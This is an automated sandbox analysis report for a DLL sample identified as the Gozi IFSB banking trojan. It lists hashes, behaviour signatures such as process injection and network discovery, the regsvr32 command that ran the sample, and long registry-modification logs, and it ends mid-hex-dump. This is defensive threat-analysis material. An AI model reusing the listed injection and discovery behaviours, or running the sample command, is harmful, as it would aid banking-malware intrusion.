Malware Analysis Report

2024-10-23 15:37

Sample ID 220803-m1nltabdel
Target 8fcfb8f38d8607c57f08f9b39139065f
SHA256 ee46bd47dbd009333a72bc752b3d38d5a87a25f90fef3d4d77515d4fd11f3c8d
Tags
gozi_ifsb 3000 banker trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ee46bd47dbd009333a72bc752b3d38d5a87a25f90fef3d4d77515d4fd11f3c8d

Threat Level: Known bad

The file 8fcfb8f38d8607c57f08f9b39139065f was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb 3000 banker trojan

Gozi, Gozi IFSB

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Enumerates processes with tasklist

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Runs net.exe

Gathers system information

Discovers systems in the same network

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-08-03 10:56

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-08-03 10:56

Reported

2022-08-03 10:58

Platform

win7-20220715-en

Max time kernel

87s

Max time network

44s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\8fcfb8f38d8607c57f08f9b39139065f.dll

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1064 wrote to memory of 1660 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1064 wrote to memory of 1660 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1064 wrote to memory of 1660 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1064 wrote to memory of 1660 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1064 wrote to memory of 1660 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1064 wrote to memory of 1660 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1064 wrote to memory of 1660 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\8fcfb8f38d8607c57f08f9b39139065f.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\8fcfb8f38d8607c57f08f9b39139065f.dll

Network

N/A

Files

memory/1064-54-0x000007FEFC251000-0x000007FEFC253000-memory.dmp

memory/1660-55-0x0000000000000000-mapping.dmp

memory/1660-56-0x00000000760E1000-0x00000000760E3000-memory.dmp

memory/1660-57-0x0000000010000000-0x000000001000E000-memory.dmp

memory/1660-62-0x00000000001A0000-0x00000000001AD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-08-03 10:56

Reported

2022-08-03 10:58

Platform

win10v2004-20220721-en

Max time kernel

150s

Max time network

149s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Windows\System32\mshta.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1728 set thread context of 2588 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2588 set thread context of 3396 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 set thread context of 3664 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 set thread context of 3520 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 set thread context of 4752 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6d898b3f779591c13da1f2b28ce32141fe3eb569a7d6f4a1152ba756aad77d00" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a94ab9e0a277a1865d03111cc1a70ac901b509c24bef77035af18ae5203b6e37" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000e4a7ec7f38a7d8018c66ae9238a7d8018c66ae9238a7d801a67d08000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000003551a672000316337343330316536313435343930633637333336316134356530633030393230643635323638333034323838616237653265306230666636373134613537620000b20009000400efbe03551a6703551a672e00000000000000000000000000000000000000000000000000b44ad300310063003700340033003000310065003600310034003500340039003000630036003700330033003600310061003400350065003000630030003000390032003000640036003500320036003800330030003400320038003800610062003700650032006500300062003000660066003600370031003400610035003700620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000302e91f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c31633734333031653631343534393063363733333631613435653063303039323064363532363833303432383861623765326530623066663637313461353762000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000616571746e6278660000000000000000e8e75957008b3b4391fdaad1e6dbb00ca590d4e8e908ed11bfb6f65c4439900fe8e75957008b3b4391fdaad1e6dbb00ca590d4e8e908ed11bfb6f65c4439900fce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003300370032003500360034003700320032002d003100390033003500320036003700330034002d0032003600330036003500350036003100380032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000052a0c1bb000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b987cab8-05db-4909- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\071ae30bc7365699d044a75ba8191e4d9c39200fc27b8565d88dae1ec87013d4" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000761de37f38a7d801bde8289238a7d801bde8289238a7d801fa580d000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000003551a672000626639623338316330663664366336383433633665373562313431623239303232633939653565616639626137626434623131623539393833626563323664360000b20009000400efbe03551a6703551a672e0000000000000000000000000000000000000000000000000052d5dc00620066003900620033003800310063003000660036006400360063003600380034003300630036006500370035006200310034003100620032003900300032003200630039003900650035006500610066003900620061003700620064003400620031003100620035003900390038003300620065006300320036006400360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000302e91f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c62663962333831633066366436633638343363366537356231343162323930323263393965356561663962613762643462313162353939383362656332366436000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000616571746e6278660000000000000000e8e75957008b3b4391fdaad1e6dbb00ca090d4e8e908ed11bfb6f65c4439900fe8e75957008b3b4391fdaad1e6dbb00ca090d4e8e908ed11bfb6f65c4439900fce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003300370032003500360034003700320032002d003100390033003500320036003700330034002d0032003600330036003500350036003100380032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000052a0c1bb000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = e80b8e9238a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\80ce800c-4267-4baa- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000002849ac7f38a7d801e36b329238a7d801e36b329238a7d8019f5112000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000003551a672000366438393862336637373935393163313364613166326232386365333231343166653365623536396137643666346131313532626137353661616437376430300000b20009000400efbe03551a6703551a672e000000000000000000000000000000000000000000000000003274da00360064003800390038006200330066003700370039003500390031006300310033006400610031006600320062003200380063006500330032003100340031006600650033006500620035003600390061003700640036006600340061003100310035003200620061003700350036006100610064003700370064003000300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000302e91f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36643839386233663737393539316331336461316632623238636533323134316665336562353639613764366634613131353262613735366161643737643030000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000616571746e6278660000000000000000e8e75957008b3b4391fdaad1e6dbb00ca190d4e8e908ed11bfb6f65c4439900fe8e75957008b3b4391fdaad1e6dbb00ca190d4e8e908ed11bfb6f65c4439900fce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003300370032003500360034003700320032002d003100390033003500320036003700330034002d0032003600330036003500350036003100380032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000052a0c1bb000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\1c74301e6145490c673361a45e0c00920d65268304288ab7e2e0b0ff6714a57b" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\67746a65-1fa0-4632- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = 9c256d9238a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000008f7fe57f38a7d8018f66709238a7d8018f66709238a7d80114a80c000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000003551a672000613934616239653061323737613138363564303331313163633161373061633930316235303963323462656637373033356166313861653532303362366533370000b20009000400efbe03551a6703551a672e000000000000000000000000000000000000000000000000003c95e100610039003400610062003900650030006100320037003700610031003800360035006400300033003100310031006300630031006100370030006100630039003000310062003500300039006300320034006200650066003700370030003300350061006600310038006100650035003200300033006200360065003300370000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f